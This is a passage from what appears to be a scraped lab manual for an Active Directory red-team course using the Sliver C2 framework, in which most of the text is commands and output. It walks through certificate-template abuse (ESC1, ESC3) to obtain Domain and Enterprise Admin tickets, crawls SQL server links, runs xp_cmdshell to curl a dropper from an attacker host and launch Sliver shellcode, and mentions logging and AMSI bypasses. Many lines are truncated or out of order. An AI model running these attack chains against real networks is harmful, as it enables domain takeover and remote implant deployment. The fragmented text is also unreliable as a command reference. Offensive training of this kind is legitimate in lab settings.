RenewTill : 10/16/2023 12:35:10 AM
ble, forwardable
KeyType : rc4_hmac
Base64(key) : zNy6GdgXubWSdZVS1CNP+g==
ASREP (key) : 20B8332220729E8DC58C6C69C8D8D053
Access the file system on dcorp-dc to check Administrator privileges.


==================================
4 04:15:02 -0800 2023
6 03:11:43 -0800 2024
0 21:51:26 -0800 2022
[snip]
[......snip....]
Purge all cache tickets using Rubeus.

[*] rubeus output:

Luid: 0x0
We can use the same method to escalate to Enterprise Admin privileges. Request a certificate for the
Enterprise Administrator - mcorp\Administrator.
-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altn
ame:moneycorp.local\administrator'
[*] certify output:

[*] Template : HTTPSCertificates
orp, DC=local
[*] AltName : moneycorp.local\administrator
[*] Request ID : 67
[*] cert.pem :

MIIEpAIBAAKCAQEAyFqI3oH[..........snip.........]
Cryptographic Provider v1.0" -export -out cert.pf
Save the certificate to esc1-EA.pem and convert it to a PFX using openssl as follows. We will use
Passw0rd! as the export password.
PS C:\AD\Tools> notepad C:\AD\Tools\esc1-EA.pem
PS C:\AD\Tools> C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc1-E

ut C:\AD\Tools\esc1-EA.pfx

Use Rubeus to request a TGT for Enterprise Administrator - mcorp\Administrator using the uploaded
PFX certificate.
ystem32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/Rubeus.exe' 'asktgt /user:money
corp.local\Administrator /dc:mcorp-dc.moneycorp.local /certificate:C:\AD\Tool
s\esc1-EA.pfx /password:Passw0rd! /ptt'
[*] rubeus output:
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=studentX, CN=Users, DC=d
ollarcorp, DC=moneycorp, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'moneycorp.local\Administrator'
doIF/jCCBfqgAwIBB[......snip.....]
ServiceName : krbtgt/moneycorp.local
UserRealm : MONEYCORP.LOCAL
StartTime : 10/9/2023 12:47:13 AM
EndTime : 10/9/2023 10:47:13 AM
RenewTill : 10/16/2024 12:47:13 AM
ble, forwardable
KeyType : rc4_hmac
Base64(key) : BkP0F5pTDNuwuOLKxW/tvw==
ASREP (key) : 0DB3DAD44DF2FFD779B748D756E7E937
Finally, access filesystem on mcorp-dc.


====================================================
drwxrwxrwx $Recycle.Bin <dir> Fri Nov 11 06:35:2
2 -0800 2022
8 -0800 2024
Lrw-rw-rw- Documents and Settings -> C:\Users 0 B Thu Nov 10 21:51:2
6 -0800 2022
[......snip....]

[*] rubeus output:

Luid: 0x0

Privilege Escalation to DA and EA using ESC3
Using Certify, Openssl and Rubeus
If we list vulnerable templates in moneycorp using certify with the /vulnerable argument, we get the
following result.
ystem32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/Certify.exe' 'find /vulnerable'
[*] certify output:

Enterprise CA Name : moneycorp-MCORP-DC-CA

DNS Hostname : mcorp-dc.moneycorp.local
FullName : mcorp-dc.moneycorp.local\moneycorp-MCORP-
DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION,
[........snip.......]
[!] Vulnerable Certificates Templates :
p-MCORP-DC-CA
Template Name : SmartCardEnrollment-Agent
Schema Version : 2
pkiextendedkeyusage : Certificate Request Agent
mspki-certificate-application-policy : Certificate Request Agent
Permissions
Enrollment Rights : dcorp\Domain Users S-1-5-21-
1874506631-3219952063-538504511-513
mcorp\Domain Admins S-1-5-21-
280534878-1496970234-700767426-512
[........snip........]

The SmartCardEnrollment-Agent template has EKU for Certificate Request Agent and grants enrollment
rights to Domain users. If we can find another template that has an EKU that allows for domain
authentication and has application policy requirement of certificate request agent, we can request
certificate on behalf of any user.
ystem32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/Certify.exe' find
[*] certify output:

[......snip......]
p-MCORP-DC-CA
Template Name : SmartCardEnrollment-Users
Schema Version : 2
Application Policies : Certificate Request Agent
pkiextendedkeyusage : Client Authentication, Encrypting
mspki-certificate-application-policy : Client Authentication, Encrypting
Permissions
Enrollment Rights : dcorp\Domain Users S-1
-5-21-1874506631-3219952063-538504511-513
[........snip........]
Now that we found such a template, request an Enrollment Agent Certificate from the template
SmartCardEnrollment-Agent.
-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Agent
'
[*] certify output:

[*] Template : SmartCardEnrollment-Agent
orp, DC=local
[*] Request ID : 68
[*] cert.pem :

MIIEpQIBAAKCAQEAs+1Ez[.......snip......]
Like earlier, save the certificate text to esc3.pem and convert to PFX. Let’s keep using Passw0rd! as the
export password.
PS C:\AD\Tools> notepad C:\AD\Tools\esc3-agent.pem
PS C:\AD\Tools> C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc3-a

gent.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export
-out C:\AD\Tools\esc3-agent.pfx
Now we can use the Enrollment Agent Certificate to request a certificate for Domain Admin from the
template SmartCardEnrollment-Users using certify.
-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Users
/onbehalfof:dcorp\administrator /enrollcert:C:\AD\Tools\esc3-agent.pfx /enro
llcertpw:Passw0rd!'
[*] certify output:

[*] Template : SmartCardEnrollment-Users
[*] On Behalf Of : dcorp\administrator
[*] Request ID : 69

[*] cert.pem :

MIIEowIBAAKCAQEAuML[......snip....]
Once again, save the certificate text to esc3-DA.pem and convert the PEM to PFX. We still continue
using Passw0rd! as the export password.
PS C:\AD\Tools> notepad C:\AD\Tools\esc3-DA.pem
PS C:\AD\Tools> C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc3-D

ut C:\AD\Tools\esc3-DA.pfx
Use the esc3-DA.pfx created above with Rubeus to request a TGT for the Domain Administrator.
ystem32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/Rubeus.exe' 'asktgt /user:admin
istrator /certificate:C:\AD\Tools\esc3-DA.pfx /password:Passw0rd! /ptt'
[*] rubeus output:
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Administrator, CN=Users,
DC=dollarcorp, DC=moneycorp, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'dollarcorp.moneycorp.local\admi
nistrator'
doIGWjCCBlagAwIBBaEDAgEW[.....snip.....]
StartTime : 10/9/2023 1:08:44 AM
EndTime : 10/9/2023 11:08:44 AM

RenewTill : 10/16/2023 1:08:44 AM
ble, forwardable
KeyType : rc4_hmac
Base64(key) : 0vGBEfzzDLcecQ2sYK0Smg==
ASREP (key) : 8A64E06355F41C7C6D30737BD1F0885A
Access the file system on dcorp-dc to check Administrator privileges.


==================================
4 04:15:02 -0800 2023
6 03:11:43 -0800 2024
0 21:51:26 -0800 2022
[snip]

[*] rubeus output:

Luid: 0x0
To escalate to Enterprise Admin, we just need to make changes to request to the SmartCardEnrollment-
Users template and Rubeus. Please note that we are using /onbehalfof: mcorp\administrator here.
-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Users
/onbehalfof:mcorp\administrator /enrollcert:C:\AD\Tools\esc3-agent.pfx /enro
llcertpw:Passw0rd!'
[*] certify output:

[*] Template : SmartCardEnrollment-Users
[*] On Behalf Of : mcorp\administrator
[*] Request ID : 69

[*] cert.pem :

MIIEowIBAAKCAQEAuML[......snip....]
Convert the PEM to esc3-EA.pfx using openssl.

PS C:\AD\Tools> notepad C:\AD\Tools\esc3-EA.pem
PS C:\AD\Tools> C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc3-E

ut C:\AD\Tools\esc3-EA.pfx
Finally, use the PFX with Rubeus as above.

ystem32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/Rubeus.exe' 'asktgt /user:money
corp.local\administrator /certificate:C:\AD\Tools\esc3-EA.pfx /dc:mcorp-dc.mo
neycorp.local /password:Passw0rd! /ptt'
[*] rubeus output:
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Administrator, CN=Users,
DC=moneycorp, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'moneycorp.local\administrator'
doIF/jCCBfqgAwIBBaEDA[......snip.....]
ServiceName : krbtgt/moneycorp.local
UserRealm : MONEYCORP.LOCAL
StartTime : 10/9/2022 1:16:40 AM
EndTime : 10/9/2022 11:16:40 AM
RenewTill : 10/16/2022 1:16:40 AM

ble, forwardable
KeyType : rc4_hmac
Base64(key) : 6IhY0zDJ2/Mvhs/UnfI86g==
ASREP (key) : 180E3F4012D7FAFAB6A1DE31F5460A5F
Finally, access filesystem on mcorp-dc.


====================================================
drwxrwxrwx $Recycle.Bin <dir> Fri Nov 11 06:35:2
2 -0800 2022
8 -0800 2024
Lrw-rw-rw- Documents and Settings -> C:\Users 0 B Thu Nov 10 21:51:2
6 -0800 2022
[......snip....]

[*] rubeus output:

Luid: 0x0

Get a Sliver session on a SQL server in eurocorp forest by abusing database links from dcorp-mssql.
Enumerating SQL Server and Links

Using SharpSQL
Let’s start with enumerating SQL servers in the current domain and then checking if dcorp\studentX has
privileges to connect to any of them. We can use SharpSQL to perform the enumeration.
SharpSQL is a C# implementation of PowerUpSQL and most of its modules and functions are similar.
Enumerate SQL servers in the domain using SharpSQL as follows.

ystem32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/SharpSQL.exe' 'Get-SQLInstanceD
omain'
[*] Output:
[*] Get-SQLInstanceDomain:
MSSQLSvc/dcorp-mssql.dollarcorp.moneycorp.local:1433
MSSQLSvc/dcorp-mssql.dollarcorp.moneycorp.local
TERMSRV/DCORP-MSSQL
RestrictedKrbHost/DCORP-MSSQL
HOST/DCORP-MSSQL
MSSQLSvc/dcorp-sql1.dollarcorp.moneycorp.local:1433
MSSQLSvc/dcorp-sql1.dollarcorp.moneycorp.local
MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433, MSSQLSvc/dcorp-mgmt.doll
arcorp.moneycorp.local
Checking if our current user - dcorp\studentX has access over any of the instances we find we have
access to dcorp-mssql.
ystem32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/SharpSQL.exe' 'Get-UserPrivs -I
nstance dcorp-mssql.dollarcorp.moneycorp.local'
[*] Output:
[*] Authenticated to: dcorp-mssql.dollarcorp.moneycorp.local
[*] Get-UserPrivs:
CONNECT SQL
VIEW ANY DATABASE

nstance dcorp-sql1.dollarcorp.moneycorp.local'
[*] Output:
[-] Authentication to: dcorp-sql1.dollarcorp.moneycorp.local failed

nstance dcorp-mgmt.dollarcorp.moneycorp.local'
[*] Output:
[-] Authentication to: dcorp-mgmt.dollarcorp.moneycorp.local failed
Enumerate Sysadmins for the database using the Get-Sysadmins module as follows.
ystem32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/SharpSQL.exe' 'Get-Sysadmins -I
nstance dcorp-mssql.dollarcorp.moneycorp.local'
[*] Output:
[*] Authenticated to: dcorp-mssql.dollarcorp.moneycorp.local
[*] Get-Sysadmins:
sa
We aren’t a Sysadmin on the database. The Get-LinkedServers command in SharpSQL and most
alternative C# MSSQL offensive exploitation tools execute EXEC sp_linkedservers; to enumerate linked
servers defined in the local server, however some links can be defined on other target server links and
can be missed.
Since SharpSQL doesn’t have the Get-SQLServerLinkCrawl module to traverse multiple links at a time, it
is possible to traverse through each SQL Server link using SharpSQL one at a time using large
OPENQUERY statements. Since this is a bit cumbersome, we will be avoiding this by using
PowerUpSQL.ps1 with a Get-SQLServerLinkCrawl command at the end to make the script an executable
script and finally converting the script into a .NET x86-x64 assembly using PS2EXE as we did in the
previous modules to be used along with execute-assembly.
Begin by copying and renaming the script as PowerUpSQLEx.ps1

PS C:\Windows\System32> copy C:\AD\Tools\PowerUpSQL-master\PowerUpSQL.ps1 C:\
AD\Tools\PowerUpSQLEx.ps1
Next, append the following query at then end to crawl and enumerate linked servers.
Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local
Finally, execite the ps2exe.ps1 script and convert the .ps1 into a .NET executable as follows.

PS C:\AD\Tools> .\ps2exe.ps1 -inputFile C:\AD\Tools\PowerUpSQLEx.ps1 -outputF
ile C:\AD\Tools\PowerUpSQLEx.exe -x64 -sta
PS2EXE-GUI v0.5.0.27 by Ingo Karstein, reworked and GUI support by Markus Sch
oltes
You are using PowerShell 4.0 or above.
Reading input file C:\AD\Tools\ps2exe\PowerUpSQLEx.ps1

Compiling file...
Output file C:\AD\Tools\ps2exe\PowerUpSQLEx.exe written
Finally, execute PowerUpSQLEx.exe using execute-assembly as follows.

ystem32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/PowerUpSQLEx.exe'
[*] Output:
Version : SQL Server 2019

Instance : DCORP-MSSQL
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL}
User : dcorp\studentX
Links : {DCORP-SQL1}

Instance : DCORP-SQL1
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1}
User : dblinkuser
Links : {DCORP-MGMT}

Instance : DCORP-MGMT
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User : sqluser
Links : {EU-SQLX.EU.EUROCORP.LOCAL}

Instance : EU-SQLX
CustomQuery :
Sysadmin : 1

Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQLX.EU.EUROCORP.LOCAL
}
User : sa
Links :
We found two new links over dcorp-mgmt and eu-sqlx. It is also noted that we have sa privileges on eu-
sqlx which is a part of the EU.EUROCORP.LOCAL domain.

Exploiting SQL Server links
Using PS2EXE, PowerUpSQL
Edit PowerUpSqlEx.ps1 again to append the following lines to the end to make it an executable script
executing the Get-SQLServerLinkCrawl module along with xp_cmdshell to test command execution on
the target.
Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Quer
y "exec master..xp_cmdshell 'whoami'"
Next use the ps2exe.ps1 script to convert PowerUpSQLEx.ps1 into a .NET assembly compatible with the
execute-assembly command as follows.
PS C:\AD\Tools> .\ps2exe.ps1 -inputFile C:\AD\Tools\PowerUpSQLEx.ps1 -outputF
ile C:\AD\Tools\PowerUpSQLEx.exe -x64 -sta
PS2EXE-GUI v0.5.0.27 by Ingo Karstein, reworked and GUI support by Markus Sch
oltes
You are using PowerShell 4.0 or above.
Reading input file C:\AD\Tools\ps2exe\PowerUpSQLEx.ps1

Compiling file...
Output file C:\AD\Tools\ps2exe\PowerUpSQLEx.exe written
Execute the .NET PowerUpSQLEx.exe using execute-assembly as follows.

[*] Output:

Instance : DCORP-MSSQL
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL}

User : dcorp\studentX
Links : {DCORP-SQL1}

Instance : DCORP-SQL1
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1}
User : dblinkuser
Links : {DCORP-MGMT}

Instance : DCORP-MGMT
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User : sqluser
Links : {EU-SQLX.EU.EUROCORP.LOCAL}

Instance : EU-SQLX
CustomQuery : {nt authority\network service, }
Sysadmin : 1
}
User : sa
Links :
Now that we have Sysadmin and xp_cmdshell privileges over EU-SQLX we can move laterally uploading a
generated payload and executing it via xp_cmdshell.
Generate a corresponding https implant for eu-sqlx as follows.

[server] sliver (dcorp-std_https) > generate -b https://172.16.100.X -e -f sh
ellcode -N eu-sqlx_https

[*] Implant saved to /mnt/c/AD/Tools/Sliver/eu-sqlx_https.bin

Upload NtDropper onto eu-sqlx leveraging xp_cmdshell using the following commands.

NOTE: We leverage cmd /c start /b to run a command in background avoiding timeout issues.

y 'exec master..xp_cmdshell "cmd /c start /b curl --output C:\Windows\temp\Nt
Dropper.exe --url http://172.16.100.X/NtDropper.exe"' -QueryTarget eu-sqlx
Append the above commands to PowerUpSQLEx.ps1 and convert it to a .NET exe as before using
ps2exe.
PS C:\AD\Tools\ps2exe> .\ps2exe.ps1 -inputFile C:\AD\Tools\PowerUpSQLEx.ps1 -
outputFile C:\AD\Tools\PowerUpSQLEx.exe -x64 -sta
Execute the following command with execute-assembly to download our NtDropper.

[*] Output:
[....snip......]

Instance : EU-SQLX
CustomQuery :
Sysadmin : 1
}
User : sa
Links :
Reiterate the process of converting PowerUpSqlEx.ps1 into an assembly one last time to leverage our
NtDropper to download and execute our tcp pivot shellcode using execute-assembly.
NOTE: Wait a few minutes before executing the Sliver payload since the payload generated is 10mb+.

y 'exec master..xp_cmdshell "cmd /c start /b C:\Windows\Temp\NtDropper.exe 17
2.16.100.X eu-sqlx_https.bin"' -QueryTarget eu-sqlxx
After executing with execute-assembly we finally have a Sliver Session on eu-sqlx.

[*] Output:
[....snip......]
[*] Session 868da2e2 eu-sqlx_https - 172.16.15.17:49815 (eu-sqlx) - windows/a

md64 - Wed, 14 Feb 2024 05:57:40 PST

Resources and Tools
Some useful resources that have been referred and would be advised to have a read through are
mentioned below.
• Getting Started with Sliver (Official Wiki): https://github.com/BishopFox/sliver/wiki/Getting-

Started
• Sliver GUI: https://github.com/BishopFox/sliver-gui
• Sliver OPSEC Notes: https://tishina.in/opsec/sliver-opsec-notes
• Hunting Sliver C2’s by Microsoft:

https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-
hunting-for-emerging-command-and-control-frameworks/
• BC Security’s logging bypasses: https://www.bc-security.org/post/powershell-logging-

obfuscation-and-some-newish-bypasses-part-1/
• ScriptBlock bypass by cobbr.io: https://cobbr.io/ScriptBlock-Logging-Bypass.html
• LDAP filters explained by Microsoft:

https://social.technet.microsoft.com/wiki/contents/articles/5392.active-directory-ldap-
syntax-filters.aspx
• Popular LDAP filters by ldapexplorer: http://www.ldapexplorer.com/en/manual/109050000-

famous-filters.htm
• PPID Spoofing by ired.team: https://www.ired.team/offensive-security/defense-

evasion/parent-process-id-ppid-spoofing
• PEzor Blog series: https://github.com/phra/PEzor#PEzor
• Slivers rportfwd command: https://github.com/BishopFox/sliver/wiki/Port-

Forwarding#reverse-port-forwarding
• Slivers SOCKS5 command: https://github.com/BishopFox/sliver/wiki/Reverse-SOCKS#in-

band-socks5

A list of all tools used throughout the lab are mentioned below.
• Sliver: https://github.com/BishopFox/sliver/releases
• StandIn: https://github.com/FuzzySecurity/StandIn
• ADSearch: https://github.com/tomcarver16/ADSearch
• ADCollector: https://github.com/dev-2null/ADCollector
• Dsquery: https://learn.microsoft.com/en-us/previous-versions/windows/it-
pro/windows-server-2012-r2-and-2012/cc732952(v=ws.11)
• Bloodhound: https://github.com/BloodHoundAD/BloodHound
• SharpHound: https://github.com/BloodHoundAD/SharpHound
• silenthound.py: https://github.com/layer8secure/SilentHound
• Sa-schtasksenum: https://github.com/sliverarmory
• Sa-Netshares: https://github.com/sliverarmory
• Sa-sc-enum: https://github.com/trustedsec/CS-Situational-Awareness-
BOF/blob/master/SA/
• SharpUp: https://github.com/GhostPack/SharpUp
• Seatbelt: https://github.com/GhostPack/Seatbelt
• LACheck: https://github.com/mitchmoser/LACheck
• CIMplant: https://github.com/FortyNorthSecurity/CIMplant
• remote-sc-tools: https://github.com/sliverarmory
• psexec:
https://github.com/BishopFox/sliver/blob/7d07f4c518838f8a31c532ac9ad5c79ec9db15f
6/client/command/exec/psexec.go
• SharpWMI: https://github.com/GhostPack/SharpWMI
• Python3 Webserver: https://developer.mozilla.org/en-

US/docs/Learn/Common_questions/set_up_a_local_testing_server
• Stracciatella: https://github.com/mgeeky/Stracciatella
• Execute-Assembly: https://github.com/med0x2e/ExecuteAssembly
• Inline-execute-assembly: https://github.com/anthemtotheego/InlineExecute-Assembly

• PS2EXE: https://github.com/MScholtes/PS2EXE
• PEzor: https://github.com/phra/PEzor
• SharpKatz: https://github.com/b4rtik/SharpKatz
• SharpSecDump: https://github.com/G0ldenGunSec/SharpSecDump
• Invoke-Mimikatz:
https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-
Mimikatz.ps1
• RACE Toolkit: https://github.com/samratashok/RACE
• Rubeus: https://github.com/GhostPack/Rubeus
• RubeusToCcache: https://github.com/SolomonSklash/RubeusToCcache
• c2tc-kerberoast: https://github.com/outflanknl/C2-Tool-
Collection/tree/main/BOF/Kerberoast
• Get-RBCD-Threaded: https://github.com/FatRodzianko/Get-RBCD-Threaded
• SharpAllowedToAct-Modify: https://github.com/pkb1s/SharpAllowedToAct
• delegationbof: https://github.com/IcebreakerSecurity/DelegationBOF
• Certify: https://github.com/GhostPack/Certify
• PowerUpSQL: https://github.com/NetSPI/PowerUpSQL
• Hashcat: https://github.com/hashcat/hashcat
• Process Hacker: https://processhacker.sourceforge.io/
Closing Note
This lab manual provides insight to operate Sliver competently with a good sense of endpoint OPSEC.
However, Sliver can implement a lot more advanced techniques like reflective dll’s, Syscall integration,
dllhijacking, socks5, rportfwd, BOF execution etc to handle advanced protections like MDE, Sysmon,
ETW, ASR and the like. This lab manual should be able to provide the base competency to research
tackling such intermediate and advanced defenses using the Sliver C2.

LabManual Sliver

Uploaded by

Copyright:

Available Formats

LabManual Sliver

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

LabManual Sliver

Uploaded by

Copyright:

Available Formats

CRTP Bootcamp with Sliver

C2 and Attack Infrastructure ................................................................................ 11

Learning Objective 1 ............................................................................................ 24

AlteredSecurity Attacking and Defending Active Directory 1

Learning Objective 2 ............................................................................................ 39

Learning Objective 3 ............................................................................................ 50

Learning Objective 4 ............................................................................................ 53

AlteredSecurity Attacking and Defending Active Directory 2

Learning Objective 5 ............................................................................................ 59

Learning Objective 6 ............................................................................................ 82

Learning Objective 7 ............................................................................................ 90

AlteredSecurity Attacking and Defending Active Directory 3

Learning Objective 8 .......................................................................................... 105

Learning Objective 9 .......................................................................................... 116

Learning Objective 10 ........................................................................................ 120

Learning Objective 11 ........................................................................................ 122

Learning Objective 12 ........................................................................................ 128

Learning Objective 13 ........................................................................................ 133

AlteredSecurity Attacking and Defending Active Directory 4

Learning Objective 15 ........................................................................................ 146

Learning Objective 16 ........................................................................................ 158

Learning Objective 17 ........................................................................................ 166

Learning Objective 18 ........................................................................................ 174

AlteredSecurity Attacking and Defending Active Directory 5

Learning Objective 20 ........................................................................................ 184

Learning Objective 21 ........................................................................................ 189

Learning Objective 22 ........................................................................................ 204

Resources and Tools .......................................................................................... 211

AlteredSecurity Attacking and Defending Active Directory 6

To understand Sliver further refer to its official documentation here.

AlteredSecurity Attacking and Defending Active Directory 7

• Dynamic code generation

AlteredSecurity Attacking and Defending Active Directory 8

There is no internet access except to https://portal.azure.com/ to avoid deliberate or accidental

Note the following details before you begin the lab:

• Foothold VM: dcorp-stdX -- 172.16.100.X

AlteredSecurity Attacking and Defending Active Directory 9

AlteredSecurity Attacking and Defending Active Directory 10

An alternative would be to modify the ConsoleHost_history.txt file by removing/altering only performed

Script Block Logging

To Bypass Script Block logging, we can use the following one-liner:

AlteredSecurity Attacking and Defending Active Directory 11

As before this works for the current session.

# Test Command that generates a 4104 event

PS C:\> Get-WinEvent -FilterHashtable @{ProviderName="Microsoft-Windows-Power

Module logging appears in two places, we will be focusing on PowerShell 5.0:

AlteredSecurity Attacking and Defending Active Directory 12

# Test Command for Module Log

AlteredSecurity Attacking and Defending Active Directory 13

AntiMalware Scan Interface (AMSI) and Defender

Automating PowerShell bypasses using Invisi-Shell

AlteredSecurity Attacking and Defending Active Directory 14

AlteredSecurity Attacking and Defending Active Directory 15

[server] sliver > https

[*] Starting HTTPS :443 listener ...

[*] Generating new windows/amd64 beacon implant binary (1m0s)

AlteredSecurity Attacking and Defending Active Directory 16

[*] Generating new windows/amd64 beacon implant binary (1m0s)

wsluser@dcorp-studentX:~$ sudo python3 -m http.server 80

AlteredSecurity Attacking and Defending Active Directory 17